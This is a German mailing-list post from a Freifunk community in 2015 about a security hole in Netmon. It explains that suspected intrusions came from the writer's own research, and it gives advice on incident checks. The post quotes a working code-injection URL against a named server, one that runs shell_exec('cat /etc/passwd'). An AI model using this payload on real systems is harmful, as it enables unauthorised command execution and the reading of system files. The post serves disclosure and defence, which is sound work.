Fwd: Schwere Sicherheitlücke in Netmon

Johannes Meyer mail at meyerjohannes.de
Mo Mär 23 15:24:15 CET 2015

Tach in die Runde.

Diese angeblichen "Hacks" die da bei euch angefallen sein sollen waren
wohl eindeutig wir bei der Recherche.

Befehl:
https://netmon.freifunk-franken.de/api.php?section=1&class=echo+shell_exec%28%27cat+/etc/passwd%27%29%3b+%2f%2f

Tim ist seit 22.03.2015 00:52 vom Ansbacher Stesie informiert und mit
einem Patch versorgt. Der Fehler ist bereits 7 Tage zuvor an alle
FFNW-Gitlababonommenten (zu denen wir nicht gehörten) raus gegangen.

Mein Server und unser neuer Server (da basiert so gut wie alles auf
Docker) war nicht betroffen, da letzterer noch nicht "in Use".

Ich empfehle ebenfalls allen Admins mal ganz genau nachzuschauen ob
eventuell dumps (pcap) auf euren Servern liegen und in den Logs mal
schauen ob diese evtl. unstimmig sind und da Dinge fehlen. Desweiteren
könntet ihr nach Tools sehen wie dnsenum oder wpscanteam. Acht geben auf
kompilierte Bashscripte. Es ist davon auszugehen dass derjenige aus der
Reihe der Admins stammt, daher schadet ein wenig paranoya auch gegenüber
alteingesessenen Admins nicht. Es macht Sinn Ergebnisse und
Recherchetätigkeiten hier auf der Liste zu kommunizieren.

Delphin habe ich gestern gebeten auch mal bei euch nach solchen Files
suchen,wurde aber anscheinend zeitnah von Tim gesperrt. Ahja.

Johannes